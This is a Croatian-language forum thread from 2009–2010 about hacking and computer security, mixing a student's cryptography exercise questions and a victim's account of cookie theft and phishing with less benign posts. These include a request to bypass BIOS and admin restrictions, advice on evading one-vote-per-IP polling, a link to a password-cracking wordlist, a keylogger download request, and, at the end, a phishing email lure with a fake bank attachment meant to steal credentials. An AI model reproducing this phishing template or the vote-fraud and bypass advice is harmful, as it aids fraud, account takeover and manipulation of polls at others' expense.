14.03.2009., 00:06
Nije mi jasno, kak bitove prebacuješ iz ruke u ruku? Jel se može s tim žonglirat?
ti meni prazan usb a ja tebi dan kasnije pun,eto mogu bitovi ko kanisteri:grli:
cain & abel se da skinuti sa softpedia i on je legalan ako se koristi za analizu sigurnosti mreže
sobravia
24.03.2009., 01:36
Ima neki prog za radenje trojana i sl.:D
Ima , popušiš masu njh,klikneš save i spremiš ih u c-program files.
Onda lijepo copy u new folder(data e) i onda opet copy na desktop.
I kada šalješ e-mail lijepo ih attach i pravo onome koga baš i ne voliš.
[°Cyber°]
03.10.2009., 22:11
Ne razumijem, zašto se ovi neki smiju na "domaći hakerski sajovi" Hrvati su jako dobri hakeri, samo da se vidi koliko nas je na HF-u.
Smiješno je jer:
Neka logika kaže da je najbolji haker onaj za kojeg nisi nikad čuo, tak da svi ovi kaj laju uzduž i poprijeko vrlo vjerojatno ne grizu :D
Može netko hakirat moj ili tvoj sajt, nađe se tutoriala po internetu milijun, nije teško raditi kad sve imaš napisano. Ali jako malo tih "lajavaca" istinski razumije mreže, zna nešto o programiranju i općenito o načinu funkcioniranja cijelog sustava, tako da čim se naiđe da neku prepreku koja nije predviđena tutorialom nastaje raspad sistema... Pa dovoljno ti je proći kroz ovaj topic, ima postova da se upišaš od smijeha.
A ovo sa rušenjem sajtova mi je ravno razbijanju prozora na zgradi. "Haha gle mene razbio sam prozor, kak sam kul, idem aploudat fotke na fejs". To kaj nemam nikakve koristi od toga i kaj sam samo napravio štetu nema veze...
Ovakva je situacija.
-BIOS PASSOWR POSTAVLJEN ( ne mogu otvoriti kuciste da ga resetiram)
samim time ne mogu niti koristiti neke stvari kao ophcrack koji super rijesi stvar jer nije postavljeno da boota prvo CD pa onda HDD, znaci nista od toga...
-SAFED MODE Administrator takodjer ima password tako da zaboravite i tu foru :)
- postoje 2 acc. ADMIN I USER
admin ima sve privilegije a USER je totalno sjeban.
U cemu je fora.
Blokirano je bilo kakvo pokretanje programa. Znaci bilo sta da donesem recimo na USBu ne mogu pokrenuti.
Probao sam .exe, .bat, .com i sl. i nece.
Iako je CMD blokiran uspio sam ga pokrenuti preko excela, pomocu hyperlinka, ali kada sam ga pokrenuo pise da je CMD disabled i ono... pres any key to exit....
Sada mene zanima ako netko ima neko rjesenje da se dodje do admin passworda na neki nacin tako da mogu maknuti restrikcije te dati ovlasti odredjenom programu ili da se nekako probije taj BIOS bez da se kuciste otvara?
Ili je admin stvarno napravio dobar job pa se nis ne moze....
Puno hvala svima
nina2007
05.12.2009., 21:22
ako netko tko se kuži ima volje pomoći...studentica sam i međuostalim slušam predmet "Sigurnost računala".
Jako mi je zanimljiv predmet, ali nažalost ne kužim dosta stvari (nije to nešto što se može naučit preko noći).
Pa bih postavila ovdje par pitanja, ako vam nije mrsko (npr. vezano za MAC, certifikate i sl.)
Ako je offtopic ispričavam se, nisam znala gdje da pitam..
:top:
Prosjecan
05.12.2009., 21:27
a tko ti brani pitati?
mada... ovisno o pitanjima i vlastitom interesu možda ćeš s vremenom pitati na naprednim korisnicima...
nina2007
05.12.2009., 22:01
da li je napredno, ne znam baš s obzirom da su u pitanju "školski primjeri"...prije je vjerojatno da ćete mi se smijati što tako nešto uopće pitam :brukica:
uglavnom, evo jedan zadatak tj. mozgalica iz certifikata:
Na slici (http://i49.tinypic.com/24g3wp2.jpg) je prikazana struktura CA. Klijent i Server znaju javni ključ koji pripada root C.A.-u (CA0)
Kako napadač (attacker) može impersonirati (izvesti tzv. krađu identiteta) server?
Koji propust u procesu provjere certifikata na strani clienta omogućava ovaj napad?
NB: ..samo da ne bi bilo zabune, ne mislim ja vršit nikakve napade...takav je zadatak.
...ili jedna mozgalica iz MAC-a u CBC modu:
Izračuna se MAC koristeći K xor X (K je tajni ključ, a X neka poznata konstanta)
Šifrant i MAC se pošalju primatelju
Dokaži da može primijetiti cut-and-paste napad
pa ako netko zna... Hvala!
lik_geek
10.12.2009., 22:08
cain & abel se da skinuti sa softpedia i on je legalan ako se koristi za analizu sigurnosti mreže
Imaš iskustva? Nešto kao backtrack? Isplati se pozabaviti?
Evo podižem temu,valjda sam na dobrom mjestu, pa zanima me kako mogu izmjeniti IP adresu?
Evo podižem temu,valjda sam na dobrom mjestu, pa zanima me kako mogu izmjeniti IP adresu?
Hm, to tek trebamo utvrditi.
Koju, ciju i kakvu ip adresu bi ti mjenjao?
I u koje svrhe?
Rekonektaj se na internet
Hm, to tek trebamo utvrditi.
Koju, ciju i kakvu ip adresu bi ti mjenjao?
I u koje svrhe?
Svoju ip adresu bi promjenila,točnije trebalo bi mi za neko glasovanje,a sa svog kom.mogu glasati samo jedanput i sad sam mislila da promjenim ip adresu pa bi mogla više puta glasati, samo neznam kako.
Kad se ponovo rekonektiram na internet isto ne mogu.Ajde pomagajte ako znate.
Svoju ip adresu bi promjenila,točnije trebalo bi mi za neko glasovanje,a sa svog kom.mogu glasati samo jedanput i sad sam mislila da promjenim ip adresu pa bi mogla više puta glasati, samo neznam kako.
Kad se ponovo rekonektiram na internet isto ne mogu.Ajde pomagajte ako znate.
Ako imas staticku IP adresu tesko je moze promjeniti.
Ali tesko da imas staticku, pa ja mislim da ce ti pomoci reconect na net i brisanje cookija.
Mada, glasanje vise puta i nije bas fer, zar ne?
Ako imas staticku IP adresu tesko je moze promjeniti.
Ali tesko da imas staticku, pa ja mislim da ce ti pomoci reconect na net i brisanje cookija.
Mada, glasanje vise puta i nije bas fer, zar ne?
Nije fer ali tako ih puno rade,šta misliš kako sam onda saznala za to.
Jučer sam probala obrisati kompletan History osim pasworda i ponovo se reconectirala ali ne pomaže.Hvala svejedno na pomoći :mig:
Nije fer ali tako ih puno rade,šta misliš kako sam onda saznala za to.
Jučer sam probala obrisati kompletan History osim pasworda i ponovo se reconectirala ali ne pomaže.Hvala svejedno na pomoći :mig:
History nije isto sto i kukiji.
Skini CCleaner, instaliraj i samo nemoj stavit kvacicu na ono da izbrise forme.
Klikni na run i on ce ti ocistit coockije.
Reconectaj se na net i to mora radit. :kava:
Išla sam na Tools i na Delete Browsing History i tamo sam obrisala cookies,history i temporary internet files, i ponovo se reconectirala na net,misliš da to nije dovoljno?Probati ću onda skinuti CClener pa ću viditi.
Poison Iwy
04.05.2010., 19:42
link na objašnjenje mog problema:
http://forum.hr/showthread.php?p=26473551#post26473551
i citat bitnog:
prije nekoliko dana se to desilo.. dakle.. izbacilo me sa vlastitog korisničkog računa.. na jednom browseru i drugom.. a jučer i na trećem.. i ne mogu više uč u vlastiti korisnički račun!
da na drugom portalu.. ne na ovom..
lozinka je bila nešto preosobno što nitko ne bi pogodio nikad, pogotovo ne netko tko me ne zna..
pretpostavljam da je netko ukrao moje cookies-to mi je rekao jedan dečko koji se kuži u te stvari.. a kako - ne znam.. navodno preko nekog linka koji sam nepažljivo otvorila.. vjerovatno tipa pisalo da je youtube il neka stranica.. a zapravo je bilo ne znam što evo objašnjenja:
http://os2.zemris.fer.hr/ns/malware/...elanto/xss.htm
prema ovom što tu piše čini se da je preko nečeg takvog taj netko došao do moje lozinke.. jer je nešto bilo sa poslužiteljem.. ja odobrila i poslalo njemu moje podatke.. nije da se kužim baš puno.. al se kužim toliko da znam da mi lozinku ni najbolja prijateljica nebi pogodila - nikad!
ista je bila za mail na tom portalu i za forum.. a da bi promjenio postojeću morao ju je znati..
i tako ju je (nekako) promjenio.. ja više na vlastiti račun ne mogu uć..
a nikako da se to riješi...
sljedeći put mogu ja stavit za password P3K5J6KF9mndiff
isto mi je.. ako on može očitat to.. preko tih cookiesa..
ono što me zanima je jeli dovoljna zaštita da te cookies brišem svaki dan?!!?
i može li ta osoba još na koji način uć opet u moj račun kad/ako se to riješi?!??!
neznam jel se to kome od vas desilo.. ali uopće nije ugodno kad netko piše pod tvojim nickom na forumu gdje si par godina.. vrijeđa tebe i druge ljude.. lijepi tvoje slike i sl...
pa ako može kakvi savjet što radit.. ovaj dečko na temi mi je rekao da vas dodatno pitam.. xD on mi je rekao da ne sačuvam lozinke na kompu.. jer da onda može netko preko mojih cookies upast u moj račun itd....
svaki savjet je dobrodošao..
hvalaaa :)
Jednostavno moraš paziti gdje klikaš, možda ti je ukrao cookie, a možda si nasjela na neki phishing. Phishing sajt izgleda autentično, ali se po adresi može vidjeti da je fejk. I kad se logiraš on te stvarno preusmjeri na pravu stranicu, ali usput i kopira što si ukucala u svoj log file. Ta 2 načina su daleko najjednostavnija, pogađanje (brute force) se ne radi za takve stvari...
marsmarin
30.10.2010., 23:02
Evo hrvatske wordliste
http://rapidshare.com/files/428021251/croatian-wordlist-checked-iso8859-2.txt
Hepburn_
19.11.2010., 15:03
Phishing sajt izgleda autentično, ali se po adresi može vidjeti da je fejk.
Jest ali... zar vi svaki put provjeravate adrese sajtova?
Jest ali... zar vi svaki put provjeravate adrese sajtova?
Ne treba svaki puta provjeravati. Ali ako kliknem na link gdje me traži podatke (username i password) obavezno pogledam adresu. A kao preventivu ne klikam na sumnjive linkove :)
Marino15
21.11.2010., 15:40
moze li mi netko objesinit cemu sluzi ardamax program i gdje ga ima za skinut na netu???'
eto kako propadne tema... niko ne zna odgovor i nitko ne zeli staviti novi post bez tog odg... eto hakde ako nitko ne zna ne mora cekati da netko ovom drugom odgovoroi neka posatvi svoje pitanje bez problema... :mig:
A kaj da mu na taj glupi post kažeš? Nek jednostavno ukuca to kaj traži u google, a ne gotovanski
drugi covijek koji me razumije... :Sex::zubo:
drugi covijek koji me razumije... :Sex::zubo:
čovijek :lol:
može li mi netko dat link za download KeyLoger?
može li mi netko dat link za download KeyLoger?
ovdje imaš najbolji,provjereno link (http://www.forum.hr/showthread.php?t=173754) :mig:
čovijek :lol:
a ma jebiga... :)
Pozdrav svima!
Trebam pomoć i nemam pojma gdje bih se drugdje obratila - ova tema mi se još čini najlogičnijom.
Naime, mojem je dečku netko provalio lozinke na facebooku i na mailu, te trenutno nema pristup niti jednome.
Povremeno se ta osoba logira na facebook pod njegovim imenom.
Obratili smo se policiji, ali nije baš da su nam ulili nekakvu nadu.
Njega nije previše briga za facebook, ali bi želio vratiti svoj e-mail, pogotov što je platio da ima više prostora na njemu, a i ima neke stvari na tom mailu koje su mu važne.
A ponajviše zbog toga što se osjeća glupo i debilno i želio bi to, ako ništa drugo, iz principa.
Stoga, ako postoji netko tko doista i zna nešto o tome i može mu nekako pomoći da vrati svoj e-mail i profil na facebooku, molila bih da mi se javi.
Znam da ovo možda zvuči malo "na rubu" i nisam sigurna je li u skladu sa pravilima foruma, ali doista se ne radi o nikakvoj zloupotrebi.
Samo treba pomoć da vrati ono što mu je na najbezobrazniji mogući način otuđeno.
Uz to, netko se na facebooku lažno predstavlja kao on.
Pozdrav svima!
Trebam pomoć i nemam pojma gdje bih se drugdje obratila - ova tema mi se još čini najlogičnijom.
Naime, mojem je dečku netko provalio lozinke na facebooku i na mailu, te trenutno nema pristup niti jednome.
Povremeno se ta osoba logira na facebook pod njegovim imenom.
Obratili smo se policiji, ali nije baš da su nam ulili nekakvu nadu.
Njega nije previše briga za facebook, ali bi želio vratiti svoj e-mail, pogotov što je platio da ima više prostora na njemu, a i ima neke stvari na tom mailu koje su mu važne.
A ponajviše zbog toga što se osjeća glupo i debilno i želio bi to, ako ništa drugo, iz principa.
Stoga, ako postoji netko tko doista i zna nešto o tome i može mu nekako pomoći da vrati svoj e-mail i profil na facebooku, molila bih da mi se javi.
Znam da ovo možda zvuči malo "na rubu" i nisam sigurna je li u skladu sa pravilima foruma, ali doista se ne radi o nikakvoj zloupotrebi.
Samo treba pomoć da vrati ono što mu je na najbezobrazniji mogući način otuđeno.
Uz to, netko se na facebooku lažno predstavlja kao on.
-----------------
Vratit moze pomocu dobrog Social E
-----------------
Uzet cemo primjer napravi mail adresu tipa sweedenbank(at)gmail.com
-----------
Onda poruka:
Dear ivan ivan you account is now activate,your payment 2000euro is now ready for buying,paying or transfer to paypal,moneybookers and other payment service.
For security reason we give your password and pin code in attachment
Ibank.exe ..... je zapravo onaj koji rade passworde...
Tako sam ja vratio svoj mail...
vBulletin® v3.8.4, Copyright ©2000-2013, Jelsoft Enterprises Ltd.